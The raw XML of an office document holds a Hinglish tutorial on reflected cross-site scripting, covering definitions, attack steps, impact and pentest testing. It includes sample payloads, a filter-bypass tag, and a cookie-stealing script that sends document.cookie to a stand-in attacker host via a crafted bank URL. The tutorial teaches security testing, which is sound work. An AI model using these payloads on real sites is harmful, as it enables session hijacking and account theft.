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tLeast" w:line="360" w:before="420" w:after="120"/>
        <w:ind w:hanging="0" w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:b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  <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>REFLECTED XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1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  <w:t>1. Reflected XSS kya hota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Simple definition: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Reflected XSS tab hota hai jab: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User jo input deta hai (URL ya form mein)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us input ko bina check kiye wapas page mein show kar deti hai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Aur attacker usmein JavaScript inject kar deta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Easy samajh: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Input → Server → Response mein wapas reflect hota hai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Isi liye naam hai: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Reflected XSS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Real Life Analogy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Socho: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Tum kisi se sawal pochtay ho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Woh bina soche samjhe tumhari baat repeat kar deta hai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Agar tum usmein dangerous cheez daal do → woh bhi repeat ho jati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2. Example Scenario (Step by Step)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Situation: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Ek website hai jahan error message show hota hai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URL kuch aisa hai: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0" w:name="code-block-viewer_Copy_5"/>
      <w:bookmarkEnd w:id="0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https://example.com/login?error=InvalidPassword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Website kya karti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Page ke andar likh deti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1" w:name="code-block-viewer_Copy_6"/>
      <w:bookmarkEnd w:id="1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Error: InvalidPassword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Problem kya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error parameter ko check nahi karti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Yani jo bhi user likhega → wahi show ho jayega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 Attack kaise hota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Ab attacker kya karega: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1: Malicious URL banayega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2" w:name="code-block-viewer_Copy_7"/>
      <w:bookmarkEnd w:id="2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https://example.com/login?error=&lt;script&gt;alert('XSS')&lt;/script&gt;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2: Victim ko bhejega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Email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WhatsApp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Fake website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Social engineering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3: Victim click karega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Page load hoga</w:t>
        <w:br/>
        <w:t>👉 Script run hogi</w:t>
        <w:br/>
        <w:t>👉 Alert box aa jayega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Important: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Yeh attack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sirf tab hota hai jab victim link click kare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Yeh automatically store nahi hota (yeh Stored XSS se difference hai)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4. Real Attack Scenario (Advanced Samajh)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Example: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Attacker bhejta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3" w:name="code-block-viewer_Copy_8"/>
      <w:bookmarkEnd w:id="3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https://bank.com?error=&lt;script&gt;fetch('https://attacker.com?cookie='+document.cookie)&lt;/script&gt;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Jab victim click karta hai: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error show karti hai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Script run hoti hai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Cookies attacker ko chali jati hain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Attacker login session hijack kar sakta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5. Potential Impact (Kya nuksan ho sakta hai)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1. Session Hijacking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Cookies chori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Account access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2. Data Theft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Personal info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Customer data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 Phishing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Fake forms inject kar sakta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4. Malware Injection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Dangerous scripts run kar sakta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6. Reflected XSS ka main feature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Yeh sabse important hai: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Input store nahi hota</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br/>
        <w:t>👉 Sirf request ke sath aata hai aur response mein reflect hota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Comparison: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Reflected XSS → temporary (link click pe)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Stored XSS → permanent (database mein saved)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7. Reflected XSS ko test kaise karte hain?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Ab yeh practical part hai — penetration testing mein use hota hai.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1: Entry Points dhoondo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Yeh jagah check karo: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1. URL Query Parameters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4" w:name="code-block-viewer_Copy_9"/>
      <w:bookmarkEnd w:id="4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?search=test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?error=wrong</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="420" w:after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?id=123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In sab mein payload inject karo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2. URL Path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5" w:name="code-block-viewer_Copy_10"/>
      <w:bookmarkEnd w:id="5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https://site.com/profile/test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Yahan bhi test karo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 HTTP Headers (advanced)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Example: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User-Agent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Referer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Rare hota hai lekin possible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2: Reflection check karo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Payload daalo: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6" w:name="code-block-viewer_Copy_11"/>
      <w:bookmarkEnd w:id="6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test123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Agar page pe show ho jaye → reflection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3: XSS test karo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Ab try karo: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7" w:name="code-block-viewer_Copy_12"/>
      <w:bookmarkEnd w:id="7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&lt;script&gt;alert('XSS')&lt;/script&gt;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Result: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Agar alert aa jaye → XSS confirmed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Agar na aaye → filtering ya encoding ho rahi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8. Important Concept (Yahan students confuse hote hain)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Reflection ka matlab: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Server tumhari input ko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wapas dikha raha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Har reflection XSS nahi hota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8" w:name="code-block-viewer_Copy_13"/>
      <w:bookmarkEnd w:id="8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 becomes &amp;lt;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Agar encode ho jaye → safe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9. Real World Trick (Pentester Tip)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Direct </w:t>
      </w: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&lt;script&gt;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block ho sakta hai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Alternative try karo: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9" w:name="code-block-viewer_Copy_14"/>
      <w:bookmarkEnd w:id="9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&lt;img src=x onerror=alert(1)&gt;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Yeh bypass techniques hoti hain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="420" w:after="120"/>
        <w:ind w:hanging="0" w:left="0" w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:b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LibreOffice/25.8.4.2$Linux_X86_64 LibreOffice_project/580$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>8</Pages>
  <Words>543</Words>
  <Characters>2703</Characters>
  <CharactersWithSpaces>3139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2026-04-03T12:47:11Z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